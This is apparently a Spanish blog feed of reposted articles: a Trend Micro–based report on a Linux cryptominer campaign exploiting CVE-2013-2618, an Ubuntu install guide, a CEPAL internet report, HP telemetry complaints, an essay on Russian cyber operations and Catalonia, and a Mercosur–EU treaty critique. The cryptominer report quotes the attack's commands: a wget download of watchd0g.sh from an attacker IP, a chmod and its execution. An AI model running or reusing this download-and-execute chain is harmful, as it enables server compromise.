Una falla de Linux de 5 años permite a los atacantes minar criptomonedas

fallo linux

Esto de la minera de las criptomonedas con el uso de equipos remotos sin la autorización de los dueños de estos se esta convirtiendo en una tendencia. Ya había hablado sobre esto en algunas ocasiones aquí en el blog sobre este tipo de situación.

Y es que esto ya se ha salido de control totalmente desde el momento en que las criptomonedas han tomado un lugar y valor bastante considerable, personas con los conocimientos suficientes para acceder a equipos vulnerando su seguridad han dejado de lado el perder el tiempo en buscar información importante o cuentas de banco para obtener un beneficio monetario.

En vez de hace esto optan por lo mas sencillo en tomar el control de estos equipos y unirlos en una red de minería y además para otras tareas que comúnmente hacen con una botnet.

De esta forma suele ser más renumerarte, pues solo se están centrando en el dinero instantáneo que esto genera.

Con la comprensión inteligente de las tendencias del mercado y el conocimiento adecuado de cripto comercio, uno puede cosechar grandes beneficios.

¿Es Linux realmente un sistema seguro?

Muchos tenemos la idea de que Linux es un sistema operativo seguro casi perfecto, la realidad es que todavía tiene algunos defectos.

Pues hace algunos días TrendMicro realizo un hallazgo, en el cual reveló un nuevo defecto en los sistemas Linux que dio a los hackers la ventaja de extraer criptomonedas usando los servidores y máquinas Linux.

En un comunicado a través de su blog comentaron lo siguiente:

A través de nuestro monitoreo relacionado con la respuesta a incidentes, observamos intentos de intrusión cuyos indicadores pudimos correlacionar con una campaña anterior de minería de criptomoneda que utilizó el malware JenkinsMiner.

La diferencia: esta campaña se dirige a servidores Linux. También es un caso clásico de vulnerabilidades reutilizadas, ya que explota una falla de seguridad obsoleta cuyo parche ha estado disponible durante casi cinco años.

En este comunicado mediante su análisis lograron identificar los sitios afectados por este fallo que afecta principalmente a Japón, Taiwán, China, EE. UU y la India.

Análisis del ataque

Mediante el análisis por parte de Smart Protection Network de Trend Micro detallan un poco en como los atacantes se aprovechan de este fallo:

Los operadores de esta campaña estaban explotando CVE-2013-2618 , una vulnerabilidad fechada en el plugin Camapi Network Weathermap, que los administradores del sistema usan para visualizar la actividad de la red.

En cuanto a por qué están explotando un viejo defecto de seguridad: Network Weathermap solo tiene dos vulnerabilidades reportadas públicamente hasta el momento, ambas desde junio de 2014.

Es posible que estos atacantes estén aprovechando no solo una falla de seguridad para la cual un exploit está disponible sino también del retraso de parches que ocurre en las organizaciones que usan la herramienta de código abierto.

Básicamente el ataque es mediante un ataque XSS:

weathermap-cryptominer-4

La parte borrosa es el objetivo de ataque, un servidor web con un puerto .

El archivo /plugins/weathermap/configs/conn.php es el archivo resultante del ataque persistente XSS en /plugins/weathermap /php .

Además de conn.php inicial, observamos una solicitud HTTP similar que se aplica a una página llamada ‘ cools.php ‘.

El programa para minar criptomonedas es distribuido a través de la vulnerabilidad del mapa meteorológico de PHP en los objetivos que son servidores de Linux

En la imagen se puede apreciar cómo se genera el ataque y se describe del siguiente modo:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

Lo que hace es mandar la indicación de descargar un archivo con wget la cual es una utilidad que casi todas las distribuciones de Linux tienen instalada por defecto

chmod 775 watchd0g.sh

hace que el archivo sea ejecutable

./watchd0g.sh

Lo que hace finalmente, es que el archivo se ejecute en el servidor.

Afortunadamente, ya hay un parche ( CVE-2013-2618 ) disponible para la falla y puedes descargarlo desde este enlace.

Si quieres conocer mas al respecto de este fallo puedes visitar este enlace.

Fuente: Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

 

Telegram @Entreverao

Anuncios

¿Pensando en instalar Ubuntu? Varias cosas que deberías tener en cuenta

ubuntu-1

El último gran lanzamiento de Canonical ha cumplido su primer mes de vida y, con las actualizaciones que ya ha recibido, se puede decir que se ha estabilizado lo suficiente como para considerar dar el salto. Es el momento perfecto, pues, para actualizar nuestra guía de instalación de Ubuntu, así como otros tutoriales que irán apareciendo en los próximos días.

Antes, con el objetivo de que los artículos que publiquemos sean lo más concisos posible, os exponemos una serie de consideraciones previas especialmente dedicadas a nuevos usuarios. Y es que instalar Ubuntu es muy sencillo, pero yendo sobre seguro se tarda mucho menos en hacerlo todo… y no hablamos solo del proceso de instalación. Así que, antes de hacer nada, piensa en lo siguiente:

¿Qué Ubuntu instalar?

Con respecto a la versión, en estos momentos, hablamos de Ubuntu 18.04 LTS, disponible desde abril de 2018 y con soporte hasta 2023. Sin embargo, Ubuntu tiene una serie de ediciones oficiales que se pueden ajustar mejor a tus necesidades, ya sea por gusto personal o por las especificaciones de tu equipo. La diferencia entre ellas es el entorno de escritorio y el consumo del mismo.

De acuerdo a nuestras pruebas te recomendamos, en orden:

  • Kubuntu, Ubuntu, Ubuntu MATE, Ubuntu Budgie, Xubuntu, Lubuntu.

En relación al consumo de recursos, la recomendación varía (de menos a más recursos):

  • Lubuntu, Xubuntu, Ubuntu MATE, Kubuntu, Ubuntu Budgie, Ubuntu.

No obstante, probarlas todas no cuesta demasiado y vale la pena invertir un rato en ello.

Probar, antes de instalar

¿Quieres instalar Ubuntu por mera curiosidad? Si lo único que te interesa es echar un vistazo, puedes descargarlo, instalarlo en una memoria USB y arrancar tu equipo con ella, sin alterar tu disco y el sistema operativo que ya tengas instalado. Necesitarás:

  • Una memoria USB de 2 GB o más.
  • La imagen de instalación de Ubuntu (enlace anterior).
  • Una aplicación para pasar la imagen al USB. Te recomendamos Etcher.
  • Buscar en tu BIOS la opción de arranque adecuada.

Pero ten en cuenta que de este modo el rendimiento y estabilidad de Ubuntu (o de cualquier otra distribución Linux que pruebes en vivo) se resienten considerablemente.

Estabilidad y soporte

Si buscas un sistema de escritorio para producción a largo plazo y lo más importante para ti es la estabilidad, tienes dos opciones que quizás te convengan más que instalar Ubuntu 18.04 en estos momentos:

  • Ubuntu 16.04.4 LTS, actualmente en su “punto de maduración óptimo” y con soporte hasta 2021.
  • Esperar a que en julio se lance Ubuntu 18.04.1, primera versión de mantenimiento y la que Canonical habilitará como actualización para los usuarios de Ubuntu 16.04.

Alternativas

La “familia Ubuntu” está muy bien nutrida y las versiones LTS (con soporte extendido por cinco años) son su mejor exponente, pero GNU/Linux ofrece un amplio abanico de alternativas de lo más interesante. De todas, la única que recomendamos para nuevos usuarios es Linux Mint, basada en Ubuntu LTS y, por lo tanto, con los beneficios de esta, incluyendo el soporte y la compatibilidad de software; pero con una presentación más amigable si cabe.

Linux Mint, a su vez, cuenta con tres ediciones oficiales, que también se distinguen por el entorno de escritorio y que te recomendamos en el siguiente orden (en orden inverso, de menor a mayor consumo de recursos):

  • Linux Mint Cinnamon, Linux Mint MATE y Linux Mint Xfce.

La última versión disponible es Linux Mint 18.3, basada en Ubuntu 16.04 LTS y con soporte hasta 2021; mientras que la próxima Linux Mint 19 se basa en Ubuntu 18.04 LTS y su lanzamiento se espera para las próximas semana (igualmente, conviene que repose un tiempo antes de instalar).

Instalación en equipos de 32-bit

Todas las ediciones oficiales de Ubuntu mantienen el soporte de 32-bit, excepto la propia Ubuntu. Para instalar Ubuntu en equipos de 32-bit hay que seguir una guía diferente y algo más complicada. No obstante, esta será muy probablemente la última versión de largo recorrido en soportar los 32-bit.

Ubuntu y Windows

Si lo que te interesa es instalar Ubuntu en el mismo equipo en el que usas Windows, vete a la guía de instalación de Ubuntu y Windows que publican nuestros compañeros de MuyComputer, actualizada para las últimas versiones de ambos sistemas.

Hasta aquí lo principal. Siempre que tengas claro todo lo anterior, instalar Ubuntu es tan sencillo como instalar Windows y mucho más rápido. En breve publicamos la guía de instalación.

 

Fuente: muylinux

Telegram @Entreverao

 

 

CEPAL destaca avances en uso y asequibilidad de Internet en América Latina pero se mantienen importantes inequidades en acceso

CEPAL destaca avances en uso y asequibilidad de Internet en América Latina pero se mantienen importantes inequidades en acceso

Entre 2010 y 2015 creció el uso de Internet América Latina y Caribe en 20 puntos porcentuales hasta alcanzar al 55% de la población impulsado por la banda ancha móvil, así como también el servicio se ha vuelto más asequible de acuerdo con los datos del informe “Estado de la banda ancha en América Latina y el Caribe 2016” de CEPAL. En 2010 una conexión de banda ancha fija de 1 Mbps representaba el 18% de los ingresos mensuales y a comienzos de 2016 significaba el 2%.

Sin embargo, CEPAL concluye que a pesar de estos avances, aún queda pendiente avanzar en materia de calidad y equidad en el acceso. “Ningún país de la región tiene al menos 5% de sus conexiones con velocidades mayores de 15Mbps mientras que, en los países avanzados, el porcentaje de conexiones de esta velocidad es cercano al 50%”, señala el estudio que además advierte inequidades en el acceso entre las zonas rurales y urbanas (41 puntos porcentuales), y entre quintiles de la distribución del ingreso.

En términos de acceso, Costa Rica es el país con mayor número de hogares conectados a Internet en América Latina y Caribe, mientras que Nicaragua es el país menos conectado. No obstante, los países menos conectados como Nicaragua, El Salvador, Guatemala y Bolivia fueron los que mayores tasas de crecimiento tuvieron en el período 2010-2015, mientras que Chile y Argentina (entre los de mayor penetración) y México y Perú (penetración media y baja respectivamente) cayeron dos posiciones en el mismo período.

De acuerdo con las cifras de CEPAL, la penetración de Internet en relación a la distribución del ingreso, en promedio en la región, tuvo un crecimiento en los sectores más ricos que duplicó al de los sectores más pobres (18 sobre 100 hogares conectados en el quintil 4 y 16 sobre 100 en el quintil 5 frente a 9 conexiones en el quintil 1).

“El país con mayor penetración en el Q1 fue Chile (33,2%). En los quintiles 2, 3 y 4, fue Uruguay. En el Q5, Costa Rica (80,3%). La penetración en el Q2 en Brasil, Colombia, Ecuador, Paraguay, Perú, el Estado Plurinacional de Bolivia y El Salvador; en el Q3 en Ecuador, Perú, Paraguay, El Salvador y Bolivia, y en el Q4 en Perú, Paraguay, Bolivia y El Salvador era menor que la de Chile y Costa Rica en el Q1”, señala el informe.

Cepal


Informe “Estado de la banda ancha en América Latina y el Caribe”

Fuente: nodal

Telegram @Entreverao

El presunto spyware preinstalado en equipos de HP pone en pie de guerra a los usuarios

El presunto spyware preinstalado en equipos de HP pone en pie de guerra a los usuarios

HP es el fabricante de PCs que más vende en todo el mundo junto a Lenovo y Dell, y por ello resulta especialmente singular que la empresa haya caído en el mismo error que sus dos rivales: ambas se vieron sacudidas por las críticas al descubrirse que habían preinstalado spyware en sus equipos.

Ahora es HP la que está afectada por el mismo problema: diversos usuarios han protestado por un cliente de telemetría asociado a la herramienta HP Touchpoint Analytics Client que se instala sin permiso y que según esas críticas ralentiza los equipos. Es fácil detectar si estás afectado, y también es relativamente sencillo solucionar el problema.

Una actualización de HP (o Microsoft), potencial culpable

Las quejas sobre el problema comenzaron a aparecer el pasado 15 de noviembre, y algunos apuntan a que ciertas actualizaciones de Windows disponibles para los equipos de HP pudieron ser las responsables. No está claro si actualizaciones en los controladores del hardware de los equipos de HP es el responsable, y ni esta empresa ni Microsoft (a quienes otros apuntan como culpable del problema) aún no ha realizado comentarios para aclarar la situación.

Hp1

Una de las quejas deja claro cómo tras la instalación de este cliente el equipo se ralentiza debido a un consumo excepcional de recursos por parte de dicha herramienta.

Su finalidad no parece clara salvo por una breve descripción que revela que la telemetría que recolecta este servicio “se usa por los servicios de estadísticas de HP Touchpoint”.

Así puedes detectar y eliminar el problema

En GHacks han analizado el problema y han revelado que es posible detectar si este servicio está funcionando en cualquier equipo de HP a través del gestor de tareas. No solo eso: es posible deshabilitarlo con la herramienta de gestión de servicios que podremos lanzar pulsando Windows+R y luego escribiendo “services.msc”.

Malware2

Eso nos permitirá detectar si el llamado “HP Touchpoint Analytics Client” está en esa lista, en cuyo caso podremos hacer doble clic en ese servicio para abrir sus detalles, establecer que esté “Deshabilitado” en el inico y además detener el servicio en la sesión actual.

Como opción, explican en GHacks, también podremos pulsar Windows+R, escribir “appwiz.cpl” y lanzar así el gestor de “Programas y Características” de Windows, desde el que podremos localizar la aplicación “HP Touchpoint Manager”. Si aparece en la lista, simplemente tenemos que pinchar en ella con el botón derecho del ratón y seleccionar la opción “Desinstalar” para eliminarla.

A pesar de que la solución parece sencilla, el problema es mucho más profundo: la insistencia de estas empresas a la hora de instalar clientes y servicios sin avisar y sin esperar la confirmación de los usuarios es preocupante, sobre todo cuando estos servicios pueden amenazar la privacidad de estos usuarios.

Fuente: xataka

Telegram @Entreverao

Hackers rusos, ciberguerra y el conflicto en Cataluña

¿Qué pruebas existen de la actividad ofensiva rusa en el ciberespacio? ¿Se han reproducido estas operaciones en España aprovechando el conflicto catalán? Al CNI no le consta.

En octubre de 2014, diversas cuentas de correo de trabajadores de la Casa Blanca y del Departamento de Estado de EEUU recibieron un mensaje que adjuntaba un vídeo humorístico en Adobe Flash. Mostraba una oficina en la que los ejecutivos eran monos vestidos con traje y corbata permanentemente de fiesta y un único humano resignado a trabajar para semejantes sujetos. Era imposible evitar que se compartiera un contenido que se ajustaba tan bien a las reglas de la memecracia. Con poco esfuerzo, la pieza cumplió su propósito: esparcirse rápidamente… y propagar por las redes internas un programa espía (spyware) que se ejecutaba inadvertidamente mientras se reproducía el vídeo y que acabó comprometiendo seriamente las comunicaciones del Gobierno estadounidense.

Los ‘hackers rusos’

Meses después se supo que el ataque procedía de unos de los actores paraestatales vinculados a Rusia: el grupo denominado Cozy Bear (o ‘Cozy Duke’ o APT29). Este agente, junto con el conocido como Fancy Bear (o APT28 o Sofocy) estarían detrás, según las investigaciones de algunas de las principales empresas de seguridad informática (como KasperskyFireEye o F-Secure), de las operaciones de ciberguerra de Rusia (en concreto, del GRU, los servicios de inteligencia de su ejército), entre ellas, la posible interferencia en las elecciones norteamericanas de 2016 y otras consultas posteriores en Europa a través del robo de información sensible y de elaboradas campañas de intoxicación informativa.

Estos grupos no han actuado en España para llevar a cabo algún tipo de ciberataque contra equipos o sistemas durante la crisis catalana, según ha constatado el CNI. Aunque sí lo han hecho en el pasado, según se recoge en memorias de años anteriores de este organismo.

¿Qué evidencias existen de la actividad ofensiva rusa en el ciberespacio? ¿Se han reproducido estas operaciones en España aprovechando el conflicto en Cataluña? ¿Cómo funcionan estas campañas de ciberpropaganda? ¿Qué buscan y qué impacto real tienen? ¿Es posible ‘hackear’ unas elecciones? ¿Sobre qué deberíamos estar verdaderamente alerta y prevenidos? (spoiler: todo apunta a que puede ser peor el remedio que la enfermedad).

Y, finalmente, ¿por qué es tan complicado saber con certeza lo que está ocurriendo?

Es cierto que algunas incertidumbres en torno a estas cuestiones estarían justificadas; por ejemplo, las que se deben a la dificultad de atribuir con precisión cualquier ataque en el ciberespacio. Sin embargo, otras son menos aceptables, al tratarse claramente de campañas interesadas que buscan imponer una determinada narrativa.

No debería sorprendernos: la máxima que afirma que “la primera víctima en una guerra es la verdad” aquí se cumple siempre.

1. La actividad de Rusia en la ciberguerra

Aunque con frecuencia los titulares periodísticos destacan el riesgo que representan los ciberterroristas o ciberdelincuentes, en realidad, según el CNI, “la mayor amenaza para la ciberseguridad nacional son las acciones de los Estados, muy especialmente aquellas que tienen su origen en los servicios de inteligencia”.

AUNQUE CON FRECUENCIA LOS TITULARES DESTACAN EL RIESGO QUE REPRESENTAN LOS CIBERTERRORISTAS, EN REALIDAD, SEGÚN EL CNI, “LA MAYOR AMENAZA PARA LA CIBERSEGURIDAD NACIONAL SON LAS ACCIONES DE LOS ESTADOS

Numerosos países vienen invirtiendo “importantes recursos para dotarse de capacidades de defensa y, también, de ataque”. Todos los indicios apuntan a que España no es una excepción. Estados Unidos, China, Rusia y Corea son las potencias más activas en este terreno.

Las acciones que se atribuyen al Kremlin no son nuevas y abarcan desde lo que se considera el primer ataque con ‘bots’ (máquinas zombies previamente ‘secuestradas’) a un país entero, Estonia, en 2007, hasta lasdiversas ofensivas contra infraestructuras críticas de Ucrania en 2015 y 2016, que parecen haber servido de banco de pruebas para una ciberguerra a mayor escala.

Por supuesto, el Gobierno ruso siempre ha negado su implicación en estas operaciones. Lo más cerca que ha estado de algún tipo de reconocimiento fueron las declaraciones de Putin el pasado 1 de junio, cuando, en un encuentro con periodistas se refirió a “hackers patrióticos” que habrían actuado por su cuenta. Un día después tachaba de “histeria” las acusaciones.

2. ¿Quién hizo qué? El problema de la atribución de ataques en el ciberespacio

Si en el terreno de “la inteligencia” (del espionaje) todo es, por definición, incierto, cuando estas campañas se libran en el ciberespacio la complejidad aumenta inevitablemente. Y es un error notable no tenerlo en cuenta.

Como advierte el experto en seguridad Bruce Schneier, “las operaciones militares clandestinas no son una novedad, particularmente en los límites turbios del terrorismo de Estado. La novedad en el ciberespacio es lo fácil que resulta para un atacante enmascarar su identidad, y la gran cantidad de gente e instituciones que pueden atacar anónimamente y que están usando las mismas herramientas y las mismas armas”.

Incidentes como el del virus ‘Stuxnet’, conocido como el primer ‘ciberarma’, no fueron reconstruidos hasta años después, cuando se logró determinar con bastante certeza la autoría de Estados Unidos e Israel.

LA NOVEDAD EN EL CIBERESPACIO ES LO FÁCIL QUE RESULTA PARA UN ATACANTE ENMASCARAR SU IDENTIDAD Y LA GRAN CANTIDAD DE GENTE E INSTITUCIONES QUE PUEDEN ATACAR ANÓNIMAMENTE

¿Cómo se realiza, entonces, la atribución de un ataque? En general, a través de indicios como la configuración del teclado del equipo empleado para programar un malware, el idioma en los metadatos; el horario de trabajo de una determinada zona del mundo, o por patrones del comportamiento de atacantes ya identificados y que se repiten.

Las pruebas, por tanto, se consiguen acumulando el mayor número de indicios sólidos posibles y siendo transparentes con los hallazgos, de modo que puedan ser rebatidos o contrastados por el resto de la comunidad de inteligencia o ciberseguridad.

Como puede suponerse, la atribución de un ciberataque se encuentra con serios problemas en el caso de las frecuentes operaciones “de bandera falsa”: aquellas en los que, a propósito, se dejan pistas erróneas apuntando a un tercer país.

Además, la atribución se complica aún más si tenemos en cuenta las recientes advertencias de investigadores de Kaspersky, presentadas en la última Virus Bulletin Digital Security Conference de Madrid, el pasado 4 de octubre, y que fueron recogidas, entre otros medios, por The Intercept.

“Cuando los investigadores forenses ven los mismos algoritmos de cifrado y certificados digitales reutilizados, por ejemplo, en varios ataques, tienden a suponer que los ataques fueron perpetrados por el mismo grupo. Pero esto no es necesariamente así”, advertían; el boletín explicaba que habían detectado hackers paraestatales usando “herramientas” (malware, exploits…) robadas que habían sido previamente empleadas por piratas de otros estados.

Un método más completo de atribución es el que propone el experto y académico Thomas Rid, del King’s College de Londres, basado en un análisis por capas: estratégico (qué busca el ataque, a quién beneficia, qué se ataca), operacional (cómo se realiza) y táctico-técnico (con qué instrumentos –tipo de malware…– se ha llevado a cabo).

3. El supuesto ‘hackeo’ ruso a las elecciones de EEUU 

Que hay actividad rusa en la Red para interferir en procesos políticos de otros países es un hecho que se encuentra respaldado con cada vez más pruebas, en particular en el caso de las últimas elecciones norteamericanas, donde, presumiblemente, se produjo una acción combinada de robo de información y acciones de intoxicación informativa.

Además, hace apenas unas semanas, la agencia Associated Press presentaba nuevos hechos: el 2 de noviembre revelaba quiénes habían sido objetivo de las operaciones de espionaje de los hackers rusos. Entre otros: “Oficiales ucranianos, figuras de la oposición, contratistas de defensa de los EE.UU. Y otros miles de adversarios del Kremlin”, desde el representante del Papa en Kiev a las Pussy Riot.

Para AP, esta lista aporta “la más detallada evidencia forense hasta el momento del estrecho alineamiento entre los hackers y el Gobierno ruso”.

LA INFORMACIÓN DE AP MUESTRA CÓMO LOS HACKERS SE ABRIERON PASO EN EL EQUIPO DE LA CAMPAÑA DE CLINTON HASTA LLEGAR A ROBAR LOS CORREOS ELECTRÓNICOS DEL PRESIDENTE JOHN PODESTA

Dos días después, el 4 de noviembre, AP reconstruía en detalle, a partir del análisis de una base de datos de 19.000 enlaces maliciosos (los usados en la campaña de phishing lanzada por los atacantes que habrían quedado al descubierto por un error al dejar pública su cuenta en la herramienta para acortar enlaces bit.ly), cómo se había producido el ataque a los sistemas del Partido Demócrata.

La información muestra cómo los hackers se abrieron paso en el equipo de la campaña de Clinton hasta llegar a robar los correos electrónicos del presidente John Podesta en marzo de 2016.

También ayuda a explicar un dato que probablemente en el futuro tenga mayores consecuencias: cómo un intermediario vinculado con Rusia presumía ante un asesor de Trump, un mes después, de que el Kremlin tenía “miles de correos electrónicos” que valían la pena sobre Clinton. Los correos robados se publicaron posteriormente, enmascarando la filtración como la acción de un hacker solitario, Guccifer 2.0.

Esta operación se combinó con una campaña masiva de propagandaorientada a alimentar la polarización de la opinión pública y también, según documentos internos de la NSA publicados por The Intercept, con otros ataques a organismos relacionados con el proceso electoral.

A pesar de las dudas iniciales, las informaciones vienen a corroborar el análisis de los servicios de inteligencia norteamericanos sobre esta ofensiva rusa contra la campaña de Hillary Clinton. Otra cuestión es determinar su impacto concreto en los resultados electorales, teniendo en cuenta que la estrategia demócrata tampoco fue la más acertada para conectar con su electorado o que los movimientos de última hora del FBI contra la candidata pudieron ser igualmente decisivos.

Existe la sospecha de que este mismo patrón de ataque combinado se ha producido en otros procesos electorales, como en las pasadas votaciones en Francia. ¿Y en España? El martes 21 de noviembre, el CNI descartó que haya ocurrido algo similar en el caso del conflicto catalán y ha asegurado no haber detectado ningún ciberataque del gobierno ruso durante la crisis.

4. Qué se sabe (y qué no) sobre la supuesta campaña rusa en Cataluña

Hasta el momento, la tesis de una supuesta injerencia rusa en Cataluña a partir de operaciones de intoxicación informativa en redes sociales se apoya principalmente en los datos aportados por el Instituto Elcano. Por el momento son escasos: que “el hashtag #Catalonia generó más de 150.279 tweets y retweets, y que alrededor de 40.000 de esas interacciones vinieron de la cuenta de Twitter de Julian Assange, mientras que 8.198 tweets y retweets surgieron de la cuenta de Edward Snowden”; y que “que las cuentas de Twitter favorables al Kremlin han aumentado en un 2000% sus menciones a la crisis catalana (detectada por la herramienta Hamilton 68), mediante el uso del hashtag #Catalan en dichas cuentas”.

Faltan datos relevantes sobre la supuesta intervención “de hackers rusos” en Cataluña. En cambio, muchas informaciones contenían errores, algunos de bulto.

Por ejemplo, confundir el número de interacciones de los tuits de Assange con el de los mensajes que realmente había publicado, o considerar un hecho significativo el porcentaje de seguidores falsos de la cuenta en Twitter del creador de Wikileaks, cuando esto es un hecho que se repite en cualquier perfil, como explicaba El Salto desmontando esa información que, además, se apoyaba en una cifra antigua sin actualizar.

Algunas de estas informaciones son meras distorsiones interesadas, que tratan de atribuir a campañas externas el indudable apoyo popular hacia la causa independentista y, en particular, el de su comunidad hacker(incluyendo algunas figuras históricas destacadas) que replicaron masivamente la web del referéndum cerrada por orden judicial o hicieron posible el ‘censo universal’. O que se intente presentar como una campaña orquestada las críticas internacionales por la violencia policial del 1 de octubre.

Tampoco debería causar extrañeza que activistas de los derechos digitales, como Snowden, se manifestaran en contra del cierre de webs en Cataluña. Organizaciones independientes como la EFF también lo censuraron.

En cuanto al origen geográfico de supuestos “tuits falsos” con mensajes polémicos sobre Cataluña, hay que tener en cuenta que, mediante análisis de redes, solo hay dos formas de establecerlo, como explica la profesora Mari Luz Congosto: o por el origen declarado en el perfil (suponiendo que sea cierto lo que se afirma) –el 65,4% de las cuentas lo incluyen– o porque sean tuits geolocalizados. El dato más fiable es la IP del usuario, una información que sólo conoce Twitter. Por lo tanto, es otra acusación que también conviene tomar con precaución.

TAMPOCO DEBERÍA CAUSAR EXTRAÑEZA QUE ACTIVISTAS DE LOS DERECHOS DIGITALES, COMO SNOWDEN, SE MANIFESTARAN EN CONTRA DEL CIERRE DE WEBS EN CATALUÑA

Por otro lado, el crecimiento abrupto de un hashtag como indicador de que una campaña es inducida no tiene por qué implicar que se trata de una maniobra exterior, como demuestran cientos de acciones de ciberactivismo.

En cuanto a la implicación del líder de Wikileaks, es cierto que se observan indicios llamativos, como su desproporcionado interés de por la cuestión catalana o algunas de sus acciones para alimentar la discusión (genialidades del arte del ‘trolleo’, que tan bien domina el hacker australiano) como polemizar con Pérez Reverte. Pero, naturalmente, no pueden considerarse pruebas de algún tipo de acción coordinada si no hay una investigación con evidencias sólidas que les diera contexto.

Y estas pruebas no parece que vayan a lograrse, al menos en lo que se refiere a una acción combinada con ciberataques para robar información o comprometer equipos, que no se ha dado en España según los datos del CNI.

5. Cómo funcionan las campañas de ciberpropaganda

El éxito de las acciones de ciberpropaganda se basa, al igual que las ataques por phishing en un gran conocimiento sobre cómo funciona Internet y sus usuarios.

No son acciones que busquen prosperar por sí mismas, sino que se suman a olas que ya existen para acentuarlas, y se aprovechan de las dinámicas previsibles de la red. Por ejemplo, del hecho de que un porcentaje elevado de la población se informa a través de las redes sociales (el 67% según Pew Research); o de la pericia para las polémicas de nidos de trolls como ‘4chan’, o de la tendencia a los bulos tendenciosos entre los afines a ideologías extremistas.

Expertos como el analista @thegrugq destacan que, en el caso de las campañas de desinformación de supuesto origen ruso, el objetivo no sería tanto apoyar una determinada causa sino fomentar la polarización de la opinión pública y sembrar dudas sobre lo que es cierto y lo que no.

Para ello, estas campañas se sirven de “granjas” de cuentas automatizadas, bots, trolls, fakes y perfiles influyentes.

En el caso de las acciones de intoxicación rusa en la campaña electoral norteamericana, se ha identificado el papel de la Internet Research Agency (IRA), una oficina en San Petersburgo que emplea a cientos de personas para postear contenidos falsos y conflictivos en la red.

Nadie duda tampoco del papel de las grandes empresas tecnológicas. De hecho, han publicado sendos informes (aquí el de Facebook y aquí el de Twitter) sobre cómo han podido ser utilizadas en las presuntas campañas de desinformación rusas y, hace unos días, han tenido que someterse al agresivo interrogatorio de senadores y congresistas en las respectivas comisiones de investigación que analizan la presunta ofensiva rusa contra las elecciones de 2016.

En cuanto a Europa, desde 2015 existe una unidad especial destinada a identificar bulos e información falsa sobre la UE, la European External Action Service East Stratcom Task Force , como recordaba Público en una información reciente.

Según este servicio europeo, las noticias falsas sobre el conflicto catalán que tienen identificadas se refieren a temas como que el español se enseña como lengua extranjera en Cataluña o que la Unión Europea apoya la violencia policial durante el referéndum.

6. Y, ¿ahora qué?

Para empezar, podemos esforzamos por comprender cómo funcionan estas campañas de intoxicación para no seguir alimentándolas incluso cuando pensamos que las estamos combatiendo; debemos exigir datos verificables y total transparencia sobre el alcance de estas operaciones en caso de que realmente se hayan producido; y sobre todo, tenemos que vigilar de cerca las “soluciones” que se están tomando o se vayan a tomar, porque todo apunta a que van a terminar afectando a nuestras libertades. Adivinen quién gana siempre.

————————-

Yolanda Quintana es periodista. Autora del libro Ciberguerra (editorial Catarata).

Fuente: http://ctxt.es

Telegram @Entreverao

El Tratado Mercosur-Unión Europea es peor que el ALCA

Jeferson Miola

Los gobiernos de Argentina, Brasil, Paraguay y [inclusive] de Uruguay anuncian la firma del Tratado de Libre Comercio del Mecosur con la Unión Europea (UE) en el marco de la undécima Reunión Ministerial de la OMC, en la semana de 10 a 14 de diciembre, en Buenos Aires.

Si fuera firmado, este Tratado será equivalente a la sentencia de muerte del Mercosur, y traerá compromisos graves para las economías de los países del bloque, porque interdita las perspectivas de desarrollo económico autónomo y soberano y elimina las políticas  tecnológicas e industriales de cada país e de este importante bloque regional:

– El Mercosur deberá reducir las tarifas de importación para productos fabricados por empresas europeas, cuyo desarrollo histórico permitió la actual producción de estas empresas en condiciones tecnológicas más avanzadas y con padrones de competitividad superiores a las empresas del Mercosur, cuyos países se encuentran en estadio atrasados de desarrollo (subdesarrollados).

– El impuesto para  importar bienes, productos manufacturados y servicios de la UE deberá ser equiparado a la tarifa praue trasnacionalesctica intra-Mercosur (una media del 4%) , que tiene  preferencias tarifarias y estímulos a los intercambios intra-bloque, concebidas para estimular el desarrollo económico, tecnológico y la generación de empleos nacionales/regionales.

– La Unión Europea no amplía o actual mercado exportador para los commodities producidos en los países del Mercosur. Para proteger (correctamente) sus productores agropecuarios, los gobiernos de varios países europeo no están inclusive exigiendo la reducción, a través de este Tratado, de las actuales cuotas de importación de proteínas importadas del Mercosur;

– Con la apertura  indiscriminada, se producirá una avalancha de importación de manufacturas europeas, como efecto de la desprotección aduanera de la industria nacional/regional;

– Ocurrirá la destrucción de las empresas del bloque, dado que aún no poseen  capacidad competitiva frente a las empresas europeas (y estaodounidensess, chinas, japonesas, etc).

– Con la eliminación de las barreras tarifarias y aduaneras, las megatrasnacionales europeas podrán evaluar como más conveniente la exportacición de sus matrices en Europa (donde generarán los empleos hoy generados aquí) que mantener fábricas instaladas en las últimas décadas en los países del bloque para disputar el abastecimiento del mercado regional.

La consecuencia del Tratado, además del desempleo en escala subcontinental, será la desindustrialización acentuada y la condena de los países del Mercosur a la reprimarización productiva.

ue no al tlcEl Tratado Mercosur-UE permitirá, además, que cualquier otra potencia económica mundial –EEUU, China, Japón- pueda invocar la Cláusula de Nación más favorecida de la Organización Mundial de Comercio (OMC) para recibir el mismo trato obtenido por las empresas europeas, representando un proceso de colonización económica, comercial, tecnológica y cultural, aún mayor.

Los efectos del acuerdo para el Mercosur serán mucho peores que el proyecto orginal del Área de Libre Comercio de las Américas (ALCA), aquella ambiciosa estrategia de anexión  política, cultural y económica del hemisferio americano que Estados Unidos no consiguieron imponer.

El ALCA fue sepultada en 2005, en la também argentina ciudad de Mar del Plata, en la Cumbre de las Américas. En esa ocasión, Lula, Chávez, Kirchner y o próprio Tabaré Vásquez  (que esta vez parece haber adherido al TLC con la UE) tuvieron destacado papel en la vitoria del No al ALCA, consigna que sintetizaba la voz del pueblo latinoamericano contra ese proyecto lanzado en 1994 por el gobierno del demócrata Bill Clinton y perseverantemente conducido por la administración república de George W. Bush.

El Tratado Mercosur-UE es mantenido, guardado en absoluto secreto por las cancillerías, agencias y ministerios económicos de los países del bloque sudamericano. Su contenido fue elaborado secretamente y decidido dentro de la más absoluta clandestinidad.

Es un acuerdo, por eso, que carga un notable déficit democrático. Dada la repercusión futura, de enorme impacto sobre la soberanía y la capacidad de desarrollo de cada país, este acuerdo no puede ser firmado sin el amplio conocimiento y el debate previo con las sociedades civiles y los parlamentos nacionales.

*Integrante del Instituto de Debates, Estudios e Alternativas (Idea) de Porto Alegre (Brasil),  fue coordinador-ejecutivo del 5º Fóro Social Mundial y Director de la Secretaría Administrativa del Mercosur. Distribuido por el Centro Latinoamericano de Análisis Estratégico (CLAE, estrategia.la)

Fuente: questiondigital

Telegram @Entreverao

Presidente Maduro tiene canal Telegram

